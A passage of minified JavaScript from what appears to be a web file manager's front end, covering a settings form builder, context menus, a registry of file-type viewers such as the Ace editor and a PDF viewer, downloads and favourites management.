r=i[o.groupID];r&&a.push(r)}}return t(a),a},i={view:{showLine:!1,selectedMulti:!1,dblClickExpand:!1,addDiyDom:function(e,t){var a=12,i=$("#"+e+" #"+t.tId+"_switch"),n=$("#"+e+" #"+t.tId+"_ico");if(n.before(i).after('').before(''+core.iconSmall("group-guest")+"").removeClass("ico_docu").addClass("group_icon").remove(),t.level>=1){var o="";i.before(o)}$("#"+e+" #"+t.tId+"_a").attr("data-group-id",t.id)}},callback:{onClick:function(e,t,a){n(t,a)}}},n=function(t,a){var i=$("#"+a.tId+"_a");if(i.removeClass("curSelectedNode"),e.attr("multiple")){i.toggleClass("this");var n=e.val();$.isArray(n)||(n=[]),i.hasClass("this")?n.push(a.id):n=_.without(n,a.id),$.each(n,function(){var t=e.find("[value="+this+"]");t.detach(),e.append(t)}),e.val(n).trigger("change")}else $("#"+t+" [treenode_a].this").removeClass("this"),i.toggleClass("this"),e.val(a.id).trigger("change"),e.select2("close")},o=function(){var t=e.val(),a=$(".select2-container--open .group-list-tree").attr("id"),i=$.fn.zTree.getZTreeObj(a);$("#"+a+" [treenode_a]").removeClass("this"),"string"==typeof t&&(t=[t]),t&&i.getNodesByFilter(function(e){inArray(t,e.id+"")&&$("#"+e.tId+"_a").addClass("this")})},s=function(e){var t=$(".select2-container--open .group-list-content");t.find(".select2-results__options,.group-list-tree").removeClass("hidden"),"search"==e?t.find(".group-list-tree").addClass("hidden"):t.find(".select2-results__options").addClass("hidden")},r=function(t){var n=function(e){e.unbind("change input").bind("change input",function(){$(this).val().length>0?s("search"):s("tree")})};if(e.attr("multiple")?n(e.parent().find(".select2-search__field")):n($(".select2-container--open .select2-search__field")),$(".select2-container--open .group-list-tree").exists())return o(),s("tree"),void 0;e.on("open",function(){o()}).on("select2:unselect",function(){o()});var r=UUID(),l='
    ';$(l).appendTo(".select2-container--open .select2-results"),$(".select2-container--open .select2-results__options").addClass("hidden").parent().addClass("group-list-content");var c=a(t);$.fn.zTree.init($("#"+r),i,c);var d=$.fn.zTree.getZTreeObj(r);d&&d.expandAll(!0),o(),s("tree")};r(t)},m=function(){var e={},a=[],n=function(e){for(var t={all:"0",user:"",group:"",role:""},a=e.split(";"),i=0;a.length>i;i++){var n=a[i].split(":");2==n.length&&(t[n[0]]=n[1])}return"0"!=t.all||t.user||t.group||t.role?!0:!1};if(t.find(".form-row").each(function(){var t=$(this),o=$(this).attr("data-type"),s=$(this).find("[name]");$(this).find(".setting-title .require").exists();var r=s.attr("name"),l=!1;switch(o){case"input":case"textarea":case"password":case"number":case"slider":case"color":case"dateTime":case"fileSelect":l=s.val();break;case"switch":l=s.prop("checked")+0+"";break;case"radio":l=s.filter(":checked").attr("value");break;case"checkbox":l=[],s.filter(":checked").each(function(){l.push($(this).val())}),l=l.join(",");break;case"select":case"selectMutil":case"tags":case"group":case"role":case"user":l=s.val(),$.isArray(l)&&(l=l.join(",")),null==l&&(l="");break;case"userSelect":var c={all:"0",user:"",group:"",role:""};t.find(".btn-group .btn-active").each(function(){var e=$(this).attr("data-type"),a="1";"all"!=e&&(a=$(t).find(".user-select-"+e+" select").val(),$.isArray(a)&&(a=a.join(",")),null==a&&(a="")),c[e]=a}),l="all:"+c.all+";user:"+c.user+";group:"+c.group+";role:"+c.role;break;default:}$(this).removeClass("error"),i[r]&&i[r].require&&(l===!1||null===l||"string"==typeof l&&""===l||"userSelect"==i[r].type&&!n(l))?($(this).addClass("error"),a.push({name:r,value:l})):e[r]=l}),a.length>0){Tips.tips(LNG.PluginConfigNotNull,"warning");var o=t.find(".panel-body"),s=t.find(".form-row.error");if(!s.parents(".tab-pane").hasClass("active")){var r=s.parents(".tab-pane").attr("id");t.find('.tab-group [data-id="'+r+'"]').click()}s.inScreen()||o.animate({scrollTop:s.offset().top-o.offset().top+o.scrollTop()},100),s.find("[name]").first().focus(),s.find(".setting-content").flash(3,100)}return{checked:0==a.length,error:a,result:e}},v=function(t){e.async(t,function(e){e&&($.isFunction(e)?e():"object"==typeof e&&e.hasOwnProperty("main")&&$.isFunction(e.main)&&e.main())})},g=function(e){if("string"==typeof e)return v(file),!1;if($.isPlainObject(e.formStyle)&&e.formStyle.loadFile){var t=e.formStyle.loadFile;"string"==typeof t&&(t=[t]),$.isArray(t)&&$(t).each(function(e,t){v(t)})}i=e,a=UUID();var n=template.compile(tplFormMake),o=n({LNG:LNG,items:e,wrapID:a});return o},b=function(e,t,a){var i=g(e);if(!i)return!1;var n={padding:0,fixed:!0,resize:!0,title:LNG.search,ico:core.icon("config"),width:680,height:500,content:i,okVal:LNG.button_save,ok:function(){var e=m();return e.checked?a(e.result):!1}};if($.isPlainObject(t))for(var s in t)n[s]=t[s];var r=$.dialog(n),l=r.DOM.wrap.find(".aui-title").html();return r.DOM.wrap.find(".modal-title").html(l),o(),r};return{makeHtml:g,bindEvent:o,getFormData:m,initDialog:b}}),define("app/common/rightMenuExtence",[],function(){$.contextMenu||($.contextMenu={}),$.contextMenu.show=function(e,t,a){e&&($.contextMenu.hidden(),$(e).contextMenu({x:t,y:a}))},$.contextMenu.menuShow=function(){var e=$(".context-menu-active"),t=e.data("contextMenu");if(e&&t){var a=t.$menu,i="disable";a.find(".disable").addClass(i),Hook.trigger("rightMenu.show",t.selector,e,a),Hook.trigger("rightMenu.show"+t.selector,e,a)}},$.contextMenu.isDisplay=function(){return 0==$(".context-menu-list:visible").length?!1:!0},$.contextMenu.hidden=function(){$(".context-menu-list").filter(":visible").filter(":not(.menu-not-auto-hidden)").trigger("contextmenu:hide")},$.contextMenu.menuAdd=function(e,t,a,i){var n=!1,o=$.contextMenu.menus;for(var s in o)if(o[s].selector==t){n=o[s];break}if(n&&e){var r=function(e){return e?-1!==e.indexOf("/")?'':'':""},l=function(e,t,a,i){var o=[],s={};if(a){for(var c in t)o.push({key:c,value:t[c]});for(var d=o.length-1;d>=0;d--)s[o[d].key]=o[d].value}else s=t;$.each(s,function(t,o){o.className=o.className||"";var s=t+" "+o.className;if("string"==typeof o)var c='
  • ';else{var d=o.name;o.accesskey&&(d+='('+o.accesskey+")");var c='
  • '+r(o.icon)+""+d+"
  • "}var p=$(c).clone();a?e.$menu.find(a).first().after(p):i&&e.$menu.find(i).first().before(p);var u=p.parent(".context-menu-list").data("contextMenu");p.data({contextMenu:u,contextMenuKey:t,contextMenuRoot:n});var f={$input:null,$label:null,accesskey:o.accesskey,className:o.className,icon:o.icon,name:o.name,_name:d,$node:p};if(u&&(u.items||(u.items={}),u.items[t]=f),"string"!=typeof o&&(e.commands||(e.commands={}),e.commands[t]=f,n.commands[t]=f,n.callbacks[t]=function(e,t){o.callback(e,t)},o.accesskey&&(n.accesskeys[o.accesskey]=f),o.items)){var c='
    ';$(c).appendTo(p),f.$menu=p.find("ul."+t),f.callback=null,f.appendTo=f.$node,f.type="sub",p.data("contextMenu",f).addClass("context-menu-submenu"),p.find("ul."+t).data({contextMenuRoot:n,contextMenu:f}),p.find("li."+t+"-first").data({contextMenuRoot:n,contextMenuKey:t+"-first",contextMenu:f}),f.items||(f.items={}),f.items[t+"-first"]={$input:null,$label:null,icon:"",name:"",_name:"",$node:p.find("li."+t+"-first")},l(f,o.items,"."+t+"-first") +}})};l(n,e,a,i)}};var e=function(){return $('').appendTo("#rightMenu"),"function"!=typeof $.contextMenu?console.info("$.contextMenu is not function!"):($.contextMenu({zIndex:9999,selector:".dialog-menu",items:{"dialog-quit":{name:LNG.close,className:"dialog-quit",icon:"remove",accesskey:"q"},"dialog-max":{name:LNG.dialog_max,className:"dialog-max",icon:"resize-full",accesskey:"a"},"dialog-min":{name:LNG.dialog_min,className:"dialog-min",icon:"minus",accesskey:"i"},sep1:"--------",refresh:{name:LNG.refresh,className:"refresh",icon:"refresh",accesskey:"r"},"open-window":{name:LNG.open_ie,className:"open-window",icon:"globe",accesskey:"b"},qrcode:{name:LNG.qrcode,className:"qrcode",icon:"qrcode",accesskey:"c"}},callback:function(e,t){var a=t.$trigger.attr("id"),i=$.dialog.list[a];switch(e){case"dialog-quit":i.close();break;case"dialog-min":i._clickMin(!1);break;case"dialog-max":i._clickMax();break;case"refresh":i.refresh();break;case"open-window":i.openWindow();break;case"qrcode":core.qrcode(i.DOM.wrap.find("iframe").attr("src"));break;default:}}}),$(".aui-title img,.aui-title .x-item-file").die("click").live("click",function(e){var t=$(this).offset();t.top+=$(this).outerHeight(),$(this).parent().parent().contextMenu({x:e.pageX,y:t.top})}).die("dblclick").live("dblclick",function(){var e=$(this).parent().parent().attr("id"),t=$.dialog.list[e];t.close(),$.contextMenu.hidden()}),void 0)};Hook.bind("rightMenu.show.dialog-menu",function(e,t){var a=e.attr("id"),i=$.dialog.list[a],n="hidden",o=".open-window,.refresh,.qrcode,.context-menu-separator";i.hasFrame()?t.find(o).removeClass(n):t.find(o).addClass(n);var s=".dialog-min,.dialog-max";$("."+a).hasClass("dialog-can-resize")?t.find(s).removeClass(n):t.find(s).addClass(n)}),e()}),define("app/app/appBase",[],function(){var e={},t={},a={},i=!1,n=function(a){a.title=void 0==a.title?a.name:a.title,void 0==a.name&&(a.name=UUID(),a.hidden=!0),e[a.name]=a,a.ext||(a.ext="");var i=a.ext.split(",");e[a.name].extArr=i;for(var n=0;i.length>n;n++){var o=trim(i[n]);e[a.name].extArr[n]=o,t[o]||(t[o]=[]);for(var s=!1,r=0;t[o].length>r;r++)if(t[o][r].name==a.name){s=!0;break}if(!s){var l=0;a.sort!==void 0&&(l=parseInt(a.sort)),t[o].push({name:a.name,sort:l}),t[o].length>1&&(t[o]=t[o].sort(function(e,t){return e.sortr;r++)o[r].name!=i&&s.push(o[r]);0==s.length?delete t[n]:t[n]=s}},r=function(i){if(i===void 0){var n=[];for(var o in e)e[o].hidden||n.push(e[o]);return n}var s=a[i],n=[];if(!s&&!t[i])return!1;if(s&&(e[s]?n.push(e[s]):delete a[i]),!t[i])return n;for(var r=0;t[i].length>r;r++){var l=t[i][r].name;e[l]&&l!=s&&n.push(e[l])}return n},l=function(e){i=e},c=function(){return i},d=function(t,a,i){a=a?a:core.pathExt(t),i=i?i:"";var n={path:t,ext:a,appName:i};if(!Hook.trigger("kodApp.open.before",n)){if(t=n.path,a=n.ext,i=n.appName)var o=e[i];else{var s=r(a);if(!s||0==s.length)return kodApp.openUnknow(t,""),void 0;var o=s[0]}if(!o)return Tips.tips("["+i+"] not exists",!1);try{o.callback(t,a),Hook.trigger("kodApp.open.after",t,a,o)}catch(l){kodApp.openUnknow(t,""),console.error("kodApp.open error:",l)}}},p=function(t){var a=r(t),i=r("");""==t&&(a=!1),a?a.push({name:""}):a=[],a=a.concat(i);for(var n={},o=0;a.length>o;o++){var s=a[o];""==s.name||s.hidden?n["step-line"]="-------":n[s.name]={app:s.name,name:s.title,className:s.className,icon:s.icon,callback:function(t){var a=e[t];if(a&&a.callback){if($(".context-menu-active"),$(".context-menu-active").hasClass("menu-tree-file"))var i=ui.tree.makeParam();else var i=ui.path.makeParam();a.callback(i.path,i.type)}}}}return n},u=function(e,t){f(e,t),G.userConfig.kodAppDefault=htmlEncode(jsonEncode(a)),G.shareInfo||$.get(G.appHost+"setting/set&k=kodAppDefault&v="+jsonEncode(a))},f=function(t,i){if("string"==typeof t)a[t]=i;else if($.isArray(t))for(var n=0;t.length>n;n++)a[t[n]]=i;else if(e[i]&&$.isArray(e[i].extArr))for(var o=e[i].extArr,n=0;o.length>n;n++)a[o[n]]=i},h=function(){G.userConfig.kodAppDefault="[]",a={}},m=function(t,a){var t=e[t];return t?a?inArray(t.extArr,a):t.ext:!1},v=function(a,i,n){var a=e[a];if(!a)return!1;var o="undefined"==n?0:parseInt(n);0==o&&a.sort!==void 0&&(o=parseInt(a.sort)),"string"==$.type(i)&&(i=i.split(","));for(var s=0;i.length>s;s++){var r=i[s];if(r){inArray(a.extArr,r)||a.extArr.push(r),t[r]||(t[r]=[]);for(var l=!1,c=0;t[r].length>c;c++)t[r][c].name!=a.name||(t[r][c].sort=o,l=!0);l||t[r].push({name:a.name,sort:o})}}},g=function(){if(G.userConfig&&G.userConfig.kodAppDefault)try{var e=G.userConfig.kodAppDefault;e=jsonDecode(htmlDecode(e)),$.isPlainObject(e)&&(a=e)}catch(t){}Hook.bind("rightMenu.show.menu-file,rightMenu.show.menu-tree-file",function(e,t){if(e.hasClass("menu-tree-file"))var a=ui.tree.makeParam();else var a=ui.path.makeParam();var i=core.pathExt(a.path),n="hidden";if(kodApp.getApp(i)){var o=kodApp.getAppMenu(i);t.find("li.open-with.context-menu-submenu").removeClass(n),t.find("ul.context-menu-list.open-with .context-menu-item").not(".open-with-first").remove(),$.contextMenu.menuAdd(o,".menu-file",".open-with-first"),$.contextMenu.menuAdd(o,".menu-tree-file",".open-with-first")}else t.find("li.open-with.context-menu-submenu").addClass(n)}),Hook.trigger("kodApp.ready")};return g(),{debug:function(){return{appList:e,openDefault:t,openUser:a}},add:n,remove:s,appSupportCheck:m,appSupportSet:v,getApp:r,getAppBind:o,getAppMenu:p,setLastOpenTarget:l,getLastOpenTarget:c,setOpenUser:u,setOpenUserLocal:f,clearOpenUser:h,open:d}}),define("app/app/editor",[],function(){kodApp.add({name:"aceEditor",title:LNG["Plugin.default.aceEditor"],sort:0,ext:"txt,textile,oexe,inc,csv,log,asc,tsv,lnk,url,webloc,meta,localized,xib,xsd,storyboard,plist,csproj,pch,pbxproj,local,xcscheme,manifest,vbproj,strings,jshintrc,sublime-project,readme,changes,changelog,version,license,changelog,abap,abc,as,asp,aspx,ada,adb,htaccess,htgroups,htgroups,htpasswd,asciidoc,adoc,asm,a,ahk,bat,cmd,cpp,c,cc,cxx,h,hh,hpp,ino,c9search_results,cirru,cr,clj,cljs,cbl,cob,coffee,cf,cson,cakefile,cfm,cs,css,curly,d,di,dart,diff,patch,dockerfile,dot,dummy,dummy,e,ge,ejs,ex,exs,elm,erl,hrl,frt,fs,ldr,ftl,gcode,feature,.gitignore,glsl,frag,vert,gbs,go,groovy,haml,hbs,handlebars,tpl,mustache,hs,hx,html,hta,htm,xhtml,eex,html.eex,erb,rhtml,html.erb,ini,inf,conf,cfg,prefs,io,jack,jade,java,ji,jl,jq,js,jsm,json,jsp,jsx,latex,ltx,bib,lean,hlean,less,liquid,lisp,ls,logic,lql,lsl,lua,lp,lucene,Makefile,makemakefile,gnumakefile,makefile,ocamlmakefile,make,md,markdown,mask,matlab,mz,mel,mc,mush,mysql,nc,nix,nsi,nsh,m,mm,ml,mli,pas,p,pl,pm,pgsql,php,phtml,shtml,php3,php4,php5,phps,phpt,aw,ctp,module,ps1,praat,praatscript,psc,proc,plg,prolog,properties,proto,py,r,cshtml,rd,rhtml,rst,rb,ru,gemspec,rake,guardfile,rakefile,gemfile,rs,sass,scad,scala,scm,sm,rkt,oak,scheme,scss,sh,bash,bashrc,sjs,smarty,tpl,snippets,soy,space,sql,sqlserver,styl,stylus,svg,swift,tcl,tex,toml,twig,swig,ts,typescript,str,vala,vbs,vb,vm,v,vh,sv,svh,vhd,vhdl,wlk,wpgm,wtest,xml,rdf,rss,wsdl,xslt,atom,mathml,mml,xul,xbl,xaml,xq,yaml,yml,vcproj,vcxproj,filters,cer,reg,config,pem,srt,ass,lrc,opf,ncx",icon:G.staticPath+"images/file_icon/icon_app/ace.png",callback:function(e){var t=ShareData.frameTop();if(t.Editor!==void 0)return t.Editor.add(urlEncode(e)),void 0;if(core.isApp("editor"))return ShareData.frameChild("OpenopenEditor",function(t){t.Editor.add(urlEncode(e))}),void 0;if(ShareData.frameTop("OpenopenEditor")){var a=t.$.dialog.list.openEditor,i=0;a&&"hidden"==$(a.DOM.wrap).css("visibility")&&(i=200,a.display(!0).zIndex().focus()),setTimeout(function(){ShareData.frameTop("OpenopenEditor",function(t){t.Editor.add(urlEncode(e))})},i)}else{var n=G.appHost+"editor/edit#filename="+urlEncode(e);G.sharePage!==void 0&&(n=G.appHost+"share/edit&user="+G.user+"&sid="+G.sid+"#filename="+urlEncode(e));var o=htmlEncode(urlDecode(core.pathThis(e)));core.openDialog(n,core.icon("edit"),o,"openEditor")}}});var e=ShareData.frameTop();e.Config&&"editor"==e.Config.pageApp&&kodApp.setOpenUserLocal(!1,"aceEditor")}),define("app/app/openWith",[],function(){kodApp.add({name:"appOpenSetting",title:LNG["Explorer.UI.appSetDefault"],ext:"",icon:G.staticPath+"images/file_icon/icon_others/setting.png",callback:function(e,t){var a="
    ",i=kodApp.getApp(t),n=!1;_.isArray(i)&&(n=i[0].name);var o=template.compile(a),s=o({LNG:LNG,apps:i,defaultApp:n,appAll:kodApp.getApp()}),r=$.dialog({id:"dialog-app-select",className:"menu-empty",padding:0,fixed:!0,ico:core.icon("search"),resize:!0,title:LNG["Explorer.UI.selectAppDesc"],width:480,height:360,padding:"20px",content:s,ok:function(){return l()}}),l=function(){var a=$("#app-default-checkbox").prop("checked"),i=$(".app-list.active .app-item.select").attr("data-app");return i?(r.close(),kodApp.open(e,t,i),a&&kodApp.setOpenUser(t,i),!0):(Tips.tips(LNG["Explorer.UI.selectAppWarning"],"warning"),!1)};$(".tab-group .tab-item").die("click").live("click",function(){var e=$(this).find("[aria-controls]").attr("aria-controls");"app-list-support"==e?$("#app-default-checkbox").prop("checked",!0):$("#app-default-checkbox").prop("checked",!1)}),$(".app-item").die("click").live("click",function(){$(this).parent().find(".select").removeClass("select"),$(this).addClass("select")}).die("dblclick").live("dblclick",function(){l()})}})}),define("app/app/html",[],function(){var e=function(e){return void 0==e?!1:0===e.indexOf("http")?!0:G.shareInfo||core.pathReadable(e)?!0:(Tips.tips(LNG.no_permission_read_all,!1),core.playSound("error"),!1)};Hook.bind("kodApp.open.before",function(t){return"folder"==t.ext?(core.isApp("explorer")||isWap()?ui.path.list(t.path+"/"):core.explorer(t.path),!0):e(t.path)?("file"==t.ext&&(t.ext=""),void 0):!0}),kodApp.openUnknow=function(e,t){void 0==t&&(t="");var a=G.appHost+"pluginApp/index&search="+core.pathExt(e),i="kodApp.open(pathHashDecode('"+pathHashEncode(e)+"'),false,'appOpenSetting');",n="kodApp.open(pathHashDecode('"+pathHashEncode(e)+"'),false,'aceEditor');",o="kodApp.download(pathHashDecode('"+pathHashEncode(e)+"'));",s="core.openWindow('"+a+"');",r=LNG.unknow_file_try+'
    '+LNG.unknow_file_tips+"
    "+t+'
    2.'+r+n+'">'+LNG["Explorer.UI.openWithText"]+'
    3.'+r+o+'">'+LNG.unknow_file_download+'
    '+r+s+'">'+LNG.PluginCenter+""+LNG.unknow_plugin_search+"
    ";$.dialog({fixed:!0,icon:"warning",title:LNG.unknow_file_title,padding:"20px 50px",content:l,cancel:!0}),$(".unknow-file a").unbind("click").bind("click",function(e){return $(this).parents(".artDialog").data("artDialog").close(),stopPP(e)})},kodApp.add({name:"download",title:LNG.download,hidden:!0,icon:"x-item-file x-html",callback:function(t){if(e(t)){var a=t;"http"!=t.substr(0,4)&&(a=G.appHost+"explorer/fileDownload&accessToken="+G.accessToken+"&path="+urlEncode(t),G.sharePage!==void 0&&(a=G.appHost+"share/fileDownload&user="+G.user+"&sid="+G.sid+"&path="+urlEncode(t))),$.dialog({icon:"succeed",title:!1,time:1.5,content:LNG.download_ready+"..."}),isWap()?window.open(a):$('').appendTo("body")}}}),kodApp.download=function(e){kodApp.open(e,"","download")},kodApp.openWindow=function(e){kodApp.open(e,"","browserOpen")},kodApp.add({name:"browserOpen",title:LNG.open_ie,sort:-100,icon:"x-item-file x-html",callback:function(t){if(e(t)){var a=core.path2url(t);isWap()?window.location.href=a:window.open(a)}}}),kodApp.add({name:"swfPlayer",title:"Flash Player",ext:"swf",icon:"x-item-file x-swf",callback:function(e,t){$.dialog({resize:!0,fixed:!0,ico:core.icon(t),title:core.pathThis(e),width:"75%",height:"65%",padding:0,content:core.createFlash(core.path2url(e))})}}),kodApp.add({name:"webLink",title:"webLink",ext:"url,webloc",sort:10,icon:"x-item-file x-html",callback:function(e,t){core.fileGet(e,function(a){if("url"==t){var i=a.match(/URL=(.*)/);if(i.length>=2)return window.open(i[1])}else if("webloc"==t)try{var n=$($.parseXML(a)),o=n.find("string").text();return window.open(o),void 0}catch(s){}kodApp.open(e,t,"editor")})}}),kodApp.add({name:"htmlView",title:LNG["Plugin.default.htmlView"],ext:"htm,html,shtml",sort:10,icon:"x-item-file x-html",callback:function(e){var t=core.path2url(e);core.openDialog(t,core.icon("html"),core.pathThis(e))}}),kodApp.add({name:"pdfView",title:"PDF Simple",ext:"pdf",sort:-1,icon:"x-item-file x-pdf",callback:function(e,t){var a=core.path2url(e),i="pdf"+UUID(),n='";$.dialog({resize:!0,fixed:!0,ico:core.icon(t),title:core.pathThis(e),width:"80%",height:"75%",padding:0,content:n}),PDFObject.embed(a,"#"+i)}}),kodApp.add({name:"oexeOpen",title:LNG["kodApp.oexe.open"],ext:"oexe",sort:100,icon:" x-item-file x-oexe",callback:function(e){core.fileGet(e,function(t){var a=jsonDecode(t);a.name=core.pathThis(e),core.openApp(a)})}}),kodApp.add({name:"oexeEdit",title:LNG["kodApp.oexe.edit"],ext:"oexe",sort:50,icon:"icon-edit ",callback:function(e){core.fileGet(e,function(t){var a=jsonDecode(t);a.name=core.pathThis(e),a.path=e,ui.path.pathOperate.appEdit(a)})}});var t={createApp:{name:LNG.app_create,className:"createApp newfile",icon:"icon-puzzle-piece x-item-file x-oexe",callback:function(){ui.path.pathOperate.appEdit(0,0,"userAdd")}}};$.contextMenu.menuAdd(t,".menu-body-main",".app-install"),$.contextMenu.menuAdd(t,".toolbar-path-more",".app-install"),$.contextMenu.menuAdd(t,".bodymain",".app-install"),Hook.bind("rightMenu.show",function(e,t,a){var i=[".menu-folder",".menu-file",".menu-tree-folder",".menu-tree-file",".menu-tree-folder-fav"];if(a.find(".context-menu-submenu").fadeOut(0).delay(0).fadeIn(0),a.removeClass("menu-auto-fit"),a.inScreen()||a.addClass("menu-auto-fit"),".menu-body-main"==e){var n=a.find(".set-file-icon-size.context-menu-submenu");"icon"==G.userConfig.listType?n.removeClass("hidden"):n.addClass("hidden")}if(_.include(i,e)){var o="disabled",s=".cute,.rname,.remove",r=".open,.open-text,.down,.share,.copy,.cute,.rname,.remove,.open-browser,.search,.more-action";t.hasClass("file-not-readable")?a.find(r).addClass(o):a.find(r).removeClass(o),t.hasClass("file-not-writeable")?a.find(s).addClass(o):a.find(s).removeClass(o)}}),Hook.bind("rightMenu.show.menu-body-main",function(e,t){var a=".upload,.past,.newfolder,.newfile",i="disabled";G.jsonData&&G.jsonData.info.canUpload?t.find(a).removeClass(i):t.find(a).addClass(i)}),Hook.bind("rightMenu.show.menu-file",function(e,t){if($(".context-menu-active").hasClass("menu-tree-file"))var a=ui.tree.makeParam();else var a=ui.path.makeParam();var i=core.pathExt(a.path),n="hidden";inArray(["jpg","jpeg","png"],i)?t.find(".set-background").removeClass(n):t.find(".set-background").addClass(n)});var a=function(){var e=".close-item,.refresh,.newfile,.past,.info",t=".open-browser",a=".explorer,.create-project,.open-project",i=".close-item,.newfile,.refresh,.past,.down,.copy,.cute,.remove,.more-action,.clone,.info,.zip,.zip-zip,.zip-tar,.zip-tgz",n=".newfile,.cute,.past,.rname,.zip,.remove,.clone,.create-link-home,.create-link,.create-project",o=$(".menu-tool-path"),s="disabled",r=ui.fileLight.fileListSelect();o.find(".context-menu-item").addClass(s),0==r.length?o.find(e).removeClass(s):1==r.length?(o.find(".context-menu-item").removeClass(s),"folder"==ui.fileLight.type(r)?o.find(t).addClass(s):o.find(a).addClass(s)):r.length>1&&o.find(i).removeClass(s),G.jsonData&&G.jsonData.info&&G.jsonData.info.canUpload===!1&&o.find(n).filter(":not(."+s+")").addClass(s)};Hook.bind("explorer.fileSelect.init",function(){ui.fileLight.listNumberSet()}),Hook.bind("explorer.fileSelect.change",function(){a(),ui.fileLight.selectNumSet()}),Hook.bind("rightMenu.show.toolbar-path-more",function(){a()}),Hook.bind("rightMenu.initFinished",function(){if(1!=G.isRoot){var e="hidden";if(core.authCheck("explorer.fileDownload")||(kodApp.remove("browserOpen"),$(".context-menu-list .down,.context-menu-list .download").addClass(e),$(".context-menu-list .share").addClass(e),$(".context-menu-list .open-text").addClass(e),$(".pathinfo .open-window").addClass(e),$(".context-menu-list .open-browser").addClass(e)),core.authCheck("explorer.search")||$(".context-menu-list .search").addClass(e),core.authCheck("explorer.mkdir")||$(".context-menu-list .newfolder").addClass(e),core.authCheck("userShare.set")||$(".context-menu-list .share").remove(),core.authCheck("explorer.mkfile")||$(".context-menu-list .newfile,.tool-path-newfile").addClass(e),core.authCheck("explorer.mkdir")||$(".context-menu-list .newfolder,[data-action=newfolder]").addClass(e),core.authCheck("explorer.pathCopy")||($(".context-menu-list .cute").addClass(e),$(".context-menu-list .copy").addClass(e)),!core.authCheck("explorer.fileUpload")){$(".context-menu-list .upload").addClass(e);var t=$("[data-action=upload-more]");t.exists()&&t.parent().addClass(e)}}})}),define("app/common/tpl/copyright.html",[],'\n'),define("app/common/tpl/themeDIY.html",[],"@media screen and (max-width:100000px) {\n body .full-background{\n position: absolute;top: 0px;left: 0px;bottom: 0px;right: 0px;\n background-color: #020202;background-size: 100% 100%;\n }\n\n {{if blurSize= (bgBlur==0?0:10) }}{{/if}}\n body .full-background:before{\n -webkit-filter: blur({{blurSize}}px);\n -moz-filter: blur({{blurSize}}px);\n -ms-filter: blur({{blurSize}}px);\n filter: blur({{blurSize}}px);\n }\n {{if bgType == 'image'}}\n body .full-background,\n body .full-background:before,\n body #body .menu-left,\n body #body .app-menu-left,\n body .aui-buttons,\n body .aui-state-focus .aui-title,body .aui-title{\n background-image:url({{bgImage}});\n }\n body .aui-state-focus .aui-title,body .aui-title{\n background-size:100%;\n }\n {{else}}\n body .full-background,\n body .full-background:before,\n body #body .menu-left, \n body #body .app-menu-left,\n body .aui-buttons,\n body .aui-state-focus .aui-title,body .aui-title{\n background:{{endColor}};\n filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='{{startColor}}', endColorstr='{{endColor}}');\n background-image: -webkit-linear-gradient({{colorRotate}}deg, {{startColor}}, {{endColor}});\n background-image: -moz-linear-gradient({{colorRotate}}deg, {{startColor}}, {{endColor}});\n background-image: -o-linear-gradient({{colorRotate}}deg, {{startColor}}, {{endColor}});\n background-image: -ms-linear-gradient({{colorRotate}}deg, {{startColor}}, {{endColor}});\n background-image: linear-gradient({{colorRotate}}deg, {{startColor}}, {{endColor}});\n }\n {{/if}}\n}\n"),define("app/src/setting/fav",[],function(){var e=G.appHost+"fav/",t=function(t){$.ajax({url:e+"get",dataType:"json",async:!1,success:function(e){return e.code?(a(e.data,t),void 0):(Tips.tips(e),void 0)},error:function(){return!1}})},a=function(e,t){var a=""+htmlEncode(LNG.name)+"("+LNG.can_not_repeat+")"+""+htmlEncode(LNG.address)+"("+LNG.absolute_path+")"+""+LNG.action+""+"";for(var i in e)a+=""+" "+" "+" "+" "+" "+" "+"";if($("table#list").html(a),t&&"fav&"==t.substring(0,4)){var n=t.split("&")[1].split("=")[1],o=t.split("&")[2].split("=")[1],s=t.split("&")[3].split("=")[1];n=htmlEncode(urlDecode(n)),o=htmlEncode(urlDecode(o));var r=" "+" "+" "+" "+" "+" "+" "+"";$(r).insertAfter("table#list tr:last")}},i=function(){var e=" "+" "+" "+"";$(e).insertAfter("table#list tr:last")},n=function(){var e=$(this).parent().parent();$(e).detach()},o=function(){var t=$(this).parent().parent(),a=$(t).find("#sname").val(),i=$(t).find("#spath").val(),n=$(t).find("#stype").val();return""==a||""==i?(Tips.tips(LNG.not_null,"error"),!1):($.ajax({url:e+"add&name="+urlEncode(a)+"&path="+urlEncode(i)+"&type="+n,dataType:"json",success:function(e){if(Tips.tips(e),e.code){$(t).attr("name",a),$(t).attr("path",i);var n=""+"";$(t).find("td.action").html(n),ShareData.frameTop("",function(e){e.ui.tree.refreshFav()})}}}),void 0)},s=function(){var a=$(this).parent().parent(),i=$(a).attr("name"),n=$(a).find("#sname").val(),o=$(a).find("#spath").val();return""==n||""==o?(Tips.tips(LNG.not_null,"error"),!1):($.ajax({dataType:"json",url:e+"edit&name="+urlEncode(i)+"&nameTo="+urlEncode(n)+"&pathTo="+urlEncode(o),success:function(e){Tips.tips(e),e.code&&($(a).attr("name",n),ShareData.frameTop("",function(e){e.ui.tree.refreshFav()}),t())}}),void 0)},r=function(){var t=$(this).parent().parent(),a=$(t).attr("name");$.ajax({url:e+"del&name="+urlEncode(a),dataType:"json",async:!1,success:function(e){Tips.tips(e),e.code&&($(t).detach(),ShareData.frameTop("",function(e){e.ui.tree.refreshFav()}))}})},l=function(){$(".fav .add").live("click",i),$(".fav .addexit").live("click",n),$(".fav .addsave").live("click",o),$(".fav .edit").live("click",s),$(".fav .del").live("click",r)};return l(),{init:t}}),define("app/src/setting/setting",[],function(e){var t,a=function(e){core.setSkin(e),ShareData.frameTop("",function(t){t.ui.setTheme(e)}),"diy"!=e?$(".theme-diy-setting").addClass("hidden"):$(".theme-diy-setting").removeClass("hidden")},i=function(e){core.setSkin(e)};template.helper("menuInfoDecode",function(e){var t=htmlEncode(urlDecode(e));return t});var n=function(t){var a={about:e("./page/about.html"),fav:e("./page/fav.html"),help:e("./page/help.html"),member:e("./page/member.html"),system:e("./page/system.html"),theme:e("./page/theme.html"),user:e("./page/user.html"),wall:e("./page/wall.html")};return a[t]},o=function(e){(""==e||void 0==e)&&(e="user"),t=e,"fav&"==e.substring(0,4)&&(e="fav"),$(".selected").removeClass("selected"),$("ul.setting a#"+e).addClass("selected");var a=window.location.href;-1!=a.indexOf("#")&&(a=a.substr(0,a.indexOf("#"))),window.location.href=a+"#"+e,$.ajax({url:G.appHost+"setting/slider&slider="+e,beforeSend:function(){$(".main").html("")},success:function(a){if("about"==e){var 